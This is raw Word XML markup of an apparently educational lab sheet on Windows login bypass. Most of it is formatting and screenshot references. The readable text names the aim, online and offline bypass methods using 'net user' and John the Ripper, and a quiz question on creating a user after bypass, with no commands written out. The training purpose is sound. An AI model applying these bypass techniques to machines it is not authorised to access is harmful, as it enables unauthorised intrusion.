          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2F977D" w14:textId="05D387EE" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F12700F" w14:textId="2161A493" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B45966F" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2223E822" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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568D2536" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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7FD95FAE" w14:textId="2FA661FC" w:rsidR="001138A0" w:rsidRDefault="00677C00" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21738752" wp14:editId="6FF1F08E">
            <wp:extent cx="5938520" cy="31851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8520" cy="3185160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ABD196" w14:textId="174080F4" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F668F2D" wp14:editId="0943F932">
            <wp:extent cx="5943600" cy="318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209FDA5F" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD234CE" w14:textId="319498AC" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0559C9" wp14:editId="02323D5B">
            <wp:extent cx="5943600" cy="318452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095D04EA" w14:textId="039C9F14" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77979DB0" wp14:editId="337298DD">
            <wp:extent cx="5943600" cy="3184525"/>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0A74D71F" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67792EC0" w14:textId="2F035F1B" w:rsidR="00021E04" w:rsidRDefault="00021E04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F64631B" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6CA94E" w14:textId="4840BB29" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E69506" wp14:editId="0D85EDB6">
            <wp:extent cx="5943600" cy="3184525"/>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3BE11ECF" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1618C125" w14:textId="322A1266" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4285116C" wp14:editId="4CBE3E48">
            <wp:extent cx="5943600" cy="318452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AB00953" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291F74E6" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF63D63" w14:textId="77777777" w:rsidR="00021E04" w:rsidRDefault="00021E04" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CE0201" w14:textId="28245766" w:rsidR="00021E04" w:rsidRDefault="00177B0F" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F21EE9D" wp14:editId="504FBB5B">
            <wp:extent cx="5943600" cy="3184525"/>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61DE2DA" w14:textId="77777777" w:rsidR="00177B0F" w:rsidRDefault="00177B0F" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075291B2" w14:textId="7D556F29" w:rsidR="00177B0F" w:rsidRPr="001C411D" w:rsidRDefault="00177B0F" w:rsidP="001138A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1046380E" wp14:editId="4A5DF3E5">
            <wp:extent cx="5943600" cy="3184525"/>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08DA2D4A" w14:textId="0F505FC2" w:rsidR="00177B0F" w:rsidRDefault="00177B0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638BDA41" w14:textId="77777777" w:rsidR="00E14EE3" w:rsidRDefault="00E14EE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64408A0A" w14:textId="116272C8" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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47F15" w:rsidRPr="001C411D" w14:paraId="187C091D" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="073B0794"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68016491"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0DB82E63" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E9E7BE6"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79E97EF3"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4BF4EA5D" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21041D2B"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1A51B762"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36D4933F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B1384A4" w14:textId="6440230F"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D47F15" w:rsidRPr="001C411D" w14:paraId="7999586F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8DDD54"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34DC1188"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r w:rsidR="00D47F15" w:rsidRPr="001C411D" w14:paraId="2698AA2A" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C70A20D" w14:textId="77777777" w:rsidR="00D47F15" w:rsidRPr="001C411D" w:rsidRDefault="00D47F15" w:rsidP="00D47F15">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37A741EB" w14:textId="77777777" w:rsidR="00D47F15" w:rsidRPr="001C411D" w:rsidRDefault="00D47F15" w:rsidP="00D47F15">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49C4E646" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:spacing w:after="0"/>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41062" w:rsidRPr="001C411D" w14:paraId="11F5632E" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C2DD2E"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4BABE7B4"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p w14:paraId="1CE4D4DC" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062"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Bypass the Login of Windows.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C6C80D"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tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="6C65FC05" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0DEAA7FE"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7E3B6B4D" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4890535F" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="0084106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Bypass the login details of target in active and passive mode on all type of operating system</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DB3AA7"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5A3870AD" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F82467A"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63D67722" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35A531C3" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform windows Login Bypass using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>netuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> and John the Ripper Tool</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D72DA96"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48E2F633" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424781ED"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4C503C36" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D22B8A9" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Login Bypass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78130B73" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Online Method</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DAB35BD" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1800"/>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System Unlocked </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3949FB" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Offline Method</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD81679" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1800"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>System locked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00841062" w:rsidRPr="001C411D" w14:paraId="1E9BBB5C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460BDEFD"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50766F4B" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A9872D9" w14:textId="77777777" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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ich command is used to create new user after Windows Login bypass?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268D0DEE" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847AD0">
